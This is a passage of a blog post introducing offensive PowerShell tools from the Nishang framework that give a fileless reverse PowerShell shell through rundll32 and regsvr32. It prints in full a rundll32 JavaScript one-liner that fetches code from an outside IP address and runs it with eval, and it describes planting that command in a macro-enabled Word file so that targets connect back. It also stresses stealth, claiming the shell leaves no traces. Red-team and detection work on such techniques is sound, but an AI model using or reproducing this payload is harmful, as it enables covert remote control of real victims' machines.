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" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a>I have been following Casey Smith's brilliant work on JavaScript and <a href="http://subt0x10.blogspot.in/2016/04/setting-up-homestead-in-enterprise-with.html">COM Scriptlets</a>. After looking at <a href="https://github.com/subTee/SCTPersistence">his work</a>, I started playing with the code. I was interested in developing easy and customizable ways to use JavaScript, SCT files, rundll32 and regvr32 for...well...interesting things. After using some weeknights and weekends, I give you following PowerShell scripts (all available in <a href="https://github.com/samratashok/nishang">Nishang</a>):</div>
<div style="text-align: justify;">
</div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Invoke-JSRatRundll </h3>
<div style="text-align: justify;">
Based on <a href="https://github.com/subTee/PoshRat">JSRAT</a> by Casey, Invoke-JSRatRundll uses rundll32.exe to execute JavaScript on a target which provides a Reverse PowerShell Shell over HTTP. Why? Because it is so cool. Also, it is file-less, the client part is just a single command and most importantly, another method to pwn targets :) The script and the client part are intelligent enough to figure out if there is a proxy in use and also to use first proxy from multiple proxies from Internet Explorer settings. Also, based on the method <a href="http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html">mentioned here</a>, Invoke-JSRatRundll doesn't leaver rundll32.exe running on the target, when "exit" command is used from the spawned reverse shell, so a clean exit. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The listener, on the attacker's machine, needs to be run from elevated PowerShell session.</div>
<div style="text-align: justify;">
This is how it looks like in action:<br />
<br />
Start the listener</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAVwVX0rUBe7iuOFPgfa3iRHFNwmfkjXcveXN0NOHvuoCWzsb4ANDz8O9vbfiu9qY06IGS0brZwvqRq_No7xSZ09JVx3h5G81o-h87p77-kBSg5gxAFxznMgBRTSE_J72X8VqKxsnFmSU/s1600/rundll_listener.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAVwVX0rUBe7iuOFPgfa3iRHFNwmfkjXcveXN0NOHvuoCWzsb4ANDz8O9vbfiu9qY06IGS0brZwvqRq_No7xSZ09JVx3h5G81o-h87p77-kBSg5gxAFxznMgBRTSE_J72X8VqKxsnFmSU/s400/rundll_listener.png" width="400" /></a></div>
The above listener provides the following command to be run on a target. Please note that will need to remove newlines:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: white; color: black;">rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");try{q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){h.SetProxy(2,v);}}finally{h.Open("GET","http://54.93.72.226:8080/connect",false);h.Send();B=h.ResponseText;eval(B)}
</textarea></pre>
</div>
<div style="text-align: justify;">
When the command is executed on the target:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN2njPpxpNy3rUCxuj6h0hBeq0m7kMVkUuCbCMpTMaBFkI-ZQ-elwKrPVVoRTuKrQvH7vzFX06w8QThRKDfTgC4rVVr1UoLGjOBPCB_YLMk4YObplqBmkvrCIEB21Y67NcLxCj9c2idic/s1600/rundll_target.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="45" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN2njPpxpNy3rUCxuj6h0hBeq0m7kMVkUuCbCMpTMaBFkI-ZQ-elwKrPVVoRTuKrQvH7vzFX06w8QThRKDfTgC4rVVr1UoLGjOBPCB_YLMk4YObplqBmkvrCIEB21Y67NcLxCj9c2idic/s400/rundll_target.png" width="400" /></a></div>
We get a connect back on the listener:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipN8seXJ1HNIyPaGi1r6cXubReXPXQqbsi-EPgOJsNSLZSX1lDdunxx_lpYgCpZfyzBe62zUFo6kpb8HRFVa9nxBUp6wZMcD2SxenlecNbIZSiUePtNlTJ4T8i-rmkN2wXYEVbt88oe_c/s1600/rundll_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipN8seXJ1HNIyPaGi1r6cXubReXPXQqbsi-EPgOJsNSLZSX1lDdunxx_lpYgCpZfyzBe62zUFo6kpb8HRFVa9nxBUp6wZMcD2SxenlecNbIZSiUePtNlTJ4T8i-rmkN2wXYEVbt88oe_c/s400/rundll_shell.png" width="400" /></a></div>
Nice! A proxy aware, file-less, Reverse PowerShell Session.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The client part (one-line command) can be used whenever we have the ability to execute a command on the target. Below is an example of using the client part with Out-Word from Nishang. Note that the the double quotes in client part need to be escaped by using double-quotes two times.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoLSTzGFAgh0tqDBoBgaLYC-sd1AnCZ67zZeOul8SOaldTK5w2HRVQ_UR-TNubPL55h5ptClwjChpOo64KeWxpRF0YI-3HMfpBIGd7vVK-Ha-0wE5oXaRw7T41OSA2G02-KGqXTM52YWU/s1600/rundll_client.png" imageanchor="1"><img border="0" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoLSTzGFAgh0tqDBoBgaLYC-sd1AnCZ67zZeOul8SOaldTK5w2HRVQ_UR-TNubPL55h5ptClwjChpOo64KeWxpRF0YI-3HMfpBIGd7vVK-Ha-0wE5oXaRw7T41OSA2G02-KGqXTM52YWU/s400/rundll_client.png" width="400" /></a></div>
When a target user opens the Word file and chooses to enable Macros, the listener will receive a connect back from the target machine. Bingo!<br />
<br /></div>
<div style="text-align: justify;">
One thing to note in Invoke-JSRatRundll is that a window pops-up temporarily whenever a command is executed on the target. It is because of the use of Exec method of WScript. The Run method which provides for silent execution could not be used as it did not return the output without storing the output temporarily somewhere on the target.</div>
<div style="text-align: justify;">
</div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Invoke-JSRatRegsvr</h3>
<div style="text-align: justify;">
This script utilizes regsvr32.exe for providing a Reverse PowerShell session over HTTP. Use of regsvr32, the technique which has been termed as <a href="https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302">"Squiblydoo"</a>, has added benefits. regsvr32.exe takes care of proxy by itself, the execution is file-less and AFAIK, leaves no traces on the target after a clean exit. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The listener needs to be run from an elevated PowerShell on the attacker's machine. This is how it looks like in action: <br />
<div class="separator" style="clear: both; text-align: center;">
